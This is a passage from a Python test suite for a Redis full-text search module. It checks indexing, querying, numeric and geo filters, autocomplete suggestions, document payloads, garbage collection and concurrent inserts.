res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(res, res2)
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.cmd('ft.create', 'idx', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testInfields(env):
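# INFIELDS should restrict matching to the specified fields only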
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 'hello world', 'body', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'body', 'hello world', 'title', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@title:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
# Calling a stem directly works even with VERBATIM.
# You need to use the escaped '+' prefix
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
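# Numeric FILTER arguments and inline @field:[min max] ranges, including exclusive '(' bounds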
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
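# FT.SUGADD/SUGGET/SUGLEN/SUGDEL, including FUZZY matching, MAX and WITHSCORES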
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1))
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
env.assertEqual(sz, r.execute_command(
'ft.SUGADD', 'ac', term, sz - 1))
sz += 1
for _ in r.retry_with_rdb_reload():
env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
# search not fuzzy
env.assertEqual(["hello world", "hello werld"],
r.execute_command("ft.SUGGET", "ac", "hello"))
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
# search fuzzy - should yield more results
env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
# search fuzzy with limit of 1
env.assertEqual(['hello world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
# scores should be returned with WITHSCORES
rc = r.execute_command(
"ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(rc))
env.assertTrue(float(rc[1]) > 0)
env.assertTrue(float(rc[3]) > 0)
rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
env.assertEqual(1L, rc)
rc = r.execute_command("ft.SUGDEL", "ac", "world")
env.assertEqual(0L, rc)
rc = r.execute_command("ft.SUGGET", "ac", "hello")
env.assertEqual(['hello werld'], rc)
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
# we don't compare the scores because they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(10):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world'))
for x in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(21, len(res))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'withpayloads')
env.assertEqual(31, len(res))
env.assertEqual(10, res[0])
for i in range(1, 30, 3):
env.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
# this test is not relevant for fork gc because it does not clean the last block
raise unittest.SkipTest()
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in range(100):
# gc is random, so we need to invoke it enough times for it to take effect
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
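# RETURN should control which fields are returned; RETURN 0 returns document ids only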
env.assertCmdOk('ft.create', 'idx', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
# Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
except:
pass
options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'schema', 'body',
'text', 'name', 'text', 'nostem')
for _ in env.retry_with_reload():
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSearchNonexistField(env):
# GH Issue 133
env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
'weight', 5.0, 'body', 'text', 'url', 'text')
env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
env.assertEqual(exp, res)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
'TEXT', 'num', 'NUMERIC', 'SORTABLE')
for _ in env.retry_with_reload():
# Ensure the index assignment is correct after an rdb load
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz')
# Try adding a hash
env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
# Get the actual value:
from redis import ResponseError
if not env.is_cluster():
with env.assertResponseError(contained='twice'):
env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)
# Try with REPLACE
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
'txt', 'foo', 'txt', 'bar')
# With replace partial
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42)
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
